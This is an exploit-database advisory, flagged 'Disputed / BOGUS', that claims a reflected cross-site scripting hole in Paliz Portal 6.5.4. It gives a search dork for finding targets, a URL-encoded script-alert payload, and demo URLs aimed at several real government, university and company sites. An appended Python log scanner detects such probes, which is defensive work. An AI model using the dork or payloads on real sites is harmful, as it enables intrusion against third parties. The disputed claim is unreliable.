Disputed / BOGUS

Paliz Portal 6.5.4 Cross Site Scripting vulnerability

Published: 2013.07.03
Credit: Ashiyane Digital Security Team
Risk: Low
CWE: CWE-79
CVE: N/A
Local: No
Remote: Yes
Dork: inurl:"Page=search/advancedsearch"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Exploit Title: Paliz Portal v6.5.4 Cross Site Scripting vulnerability #
#
+ Exploit Author: Ashiyane Digital Security Team #
#
+ Home : www.Ashiyane.org #
#
+ Vendor Homepage: www.palizct.com #
#
+ Version: 6.5.4 #
#
+ Category: Web Application #
#
+ Tested on: Windows 7 #
#
+ Dork: inurl:"Page=search/advancedsearch" #
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
+ Location:site/Page.aspx?search=%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss]
#
+ DEm0:http://mobinXnet.ir/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss]
+ DEm0:http://www.tazirXat.gov.ir/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch&init[Xss]
+ DEm0:http://www.gumsX.ac.ir/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss]
+ DEm0:http://koXoy.ut.ac.ir/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss]
+ DEm0:http://www.irXobacco.com/portal/newsite/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss]
======================================
* Greetz to: My Lord Allah
* Sp Tnx To:
Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,am118,PrinceofHacking,Alireza66,Amirh03in and all
Ashiyane Security [ Researcher Team AND Deface Team ]

* The Last One : My Self, tr0janman
*******
--------------------------------------------
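
An added example (not part of the original advisory, and not the vendor's code): a log check that flags requests shaped like the one in the Location line above, i.e. HTML markup in the `search` parameter of `Page.aspx`. The W3C-style field order, the tag-opener heuristic and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Heuristic (assumption): a search term has no reason to contain an HTML tag opener.
TAG_OPENER = re.compile(r"<\s*/?\s*[a-z]", re.I)

# Constructed sample log; assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2013-07-03 10:00:01 198.51.100.7 GET /Page.aspx search=%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch 200
2013-07-03 10:00:05 198.51.100.8 GET /Page.aspx search=annual+report&mID=1442&Page=search/advancedsearch 200
2013-07-03 10:00:09 198.51.100.9 GET /Page.aspx Search=%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E&Page=search/advancedsearch 200
2013-07-03 10:00:12 198.51.100.7 GET /default.aspx q=%3Cscript%3E 200
"""

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded input (%253C) is also seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_probe(stem, query):
    """True if the request targets Page.aspx with markup in its 'search' parameter."""
    if not stem.lower().endswith("/page.aspx"):
        return False
    for name, values in parse_qs(query, keep_blank_values=True).items():
        # ASP.NET treats query-string keys case-insensitively.
        if name.lower() == "search" and any(TAG_OPENER.search(decode_fully(v)) for v in values):
            return True
    return False

def scan(log_text):
    """Return (time, client_ip) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        if is_probe(fields[4], fields[5]):
            hits.append((fields[1], fields[2]))
    return hits

if __name__ == "__main__":
    for when, ip in scan(SAMPLE_LOG):
        print(f"possible XSS probe at {when} from {ip}")
```

A hit only shows that markup was submitted; whether the portal reflects it unencoded has to be confirmed against the application's output.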



Copyright 2017, cxsecurity.com